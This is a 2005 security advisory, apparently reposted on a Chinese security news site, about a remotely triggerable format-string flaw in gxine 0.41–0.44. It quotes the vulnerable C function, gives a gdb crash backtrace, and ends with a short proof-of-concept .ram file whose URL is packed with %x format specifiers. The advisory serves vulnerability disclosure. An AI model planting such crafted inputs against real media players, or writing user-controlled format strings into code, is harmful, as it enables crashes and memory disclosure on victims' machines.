首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>新闻>安全新闻>文章内容
pst.advisory : gxine remote exploitable . opensource is god .lol windows
来源:www.0xbadexworm.org 作者:jsk 发布时间:2005-05-31  

pst.advisory : gxine remote exploitable . opensource is god .lol windows


gxine remote exploitable . opensource is god .lol windows


Systems affected:

gxine 0.44 0.43 0.42 0.41


no affected

no all exploitable


1:why: it is a http hostname format strings vuln. new firefox can run gxine in many linux DS...


so very dangerous!!!!!!

2:tips:

void v_display_message (const gchar *title, GtkMessageType type,
const gchar *fmt, va_list ap)
{
GtkWidget *dialog;
gchar *msg;
gboolean modal = (fmt == NULL);

if (modal)
fmt = va_arg (ap, const gchar *);

msg = g_strdup_vprintf (fmt, ap);
va_end (ap);

dialog = gtk_message_dialog_new (NULL, GTK_DIALOG_DESTROY_WITH_PARENT, type,
GTK_BUTTONS_CLOSE, msg); boom ...GTK_BUTTONS_CLOSE,(((((%s))))) msg


gtk_window_set_title (GTK_WINDOW (dialog), title);
gtk_window_set_position (GTK_WINDOW (dialog), GTK_WIN_POS_CENTER);

if (modal)
gtk_window_set_modal (GTK_WINDOW(dialog), TRUE);

g_signal_connect (G_OBJECT (dialog), "response",
G_CALLBACK (response_cb), NULL);
g_object_set_data (G_OBJECT (dialog), "msg", msg);
gtk_widget_show (dialog);
}


v_display_message ()--- display_error" many other func" ()----display_error" many other func" ()
---report_error ()---http_open ()


3:more show


Program received signal SIGSEGV, Segmentation fault.
0x405cdc43 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x405cdc43 in vfprintf () from /lib/libc.so.6
#1 0x405ec976 in vasprintf () from /lib/libc.so.6
#2 0x405493d7 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
#3 0x40539674 in g_strdup_vprintf () from /usr/lib/libglib-2.0.so.0
#4 0x40217391 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#5 0x0806dc83 in v_display_message ()
#6 0x0806dda2 in display_error ()
#7 0x0806cf45 in report_error ()
#8 0x0806d278 in http_open ()
Previous frame inner to this frame (corrupt stack?)
(gdb) x/i $eip
0x405cdc43 <vfprintf+10195>: mov %ecx,(%eax)


4: A LAME proof-of-concept

cat fmtexp.ram

http://AAAAA%x%x%x%x%x%x%x%x%x%x%x%...paihb/42tj02.rm


CREDIT:

jsk:exworm (www.0xbadexworm.org) discovery this vulnerability

ths: all members from PST and doris


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·几个常见的CGI攻击方法
·RAdmin 服务端高级配置
·linux/x86 add root user r00t w
·利用SSL漏洞 专家几分钟攻破微软
·二代身份证可能导致身份信息泄露
·外泄Windows代码者来自微软合作
·呵呵~今天换服务器了
·美国老牌黑客往事:控制电台全部
·支付宝控件漏洞——到底是谁在撒
·Halflife 3.1.1.1 - Remote expl
·我国首破病毒大案 熊猫烧香作者
·“互联网之父”建议深入研究安全
  相关文章
·pst.advisory: gedit fun. opens
·超文本传输协议有漏洞,导致新型
·Microsoft Internet Explorer ja
·Golden FTP Server Pro Remote U
·Halflife 3.1.1.1 - Remote expl
·利用MS05-039漏洞传播的蠕虫公告
·RevilloC MailServer 1.x (RCPT
·Windows Xp Sp2对于溢出保护
·miniBB <= 2.0.2 (bb_func_tx
·Gmail存在严重安全漏洞 无需密码
·linux/x86 add root user r00t w
·微软发布10月份安全公告 修复多
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved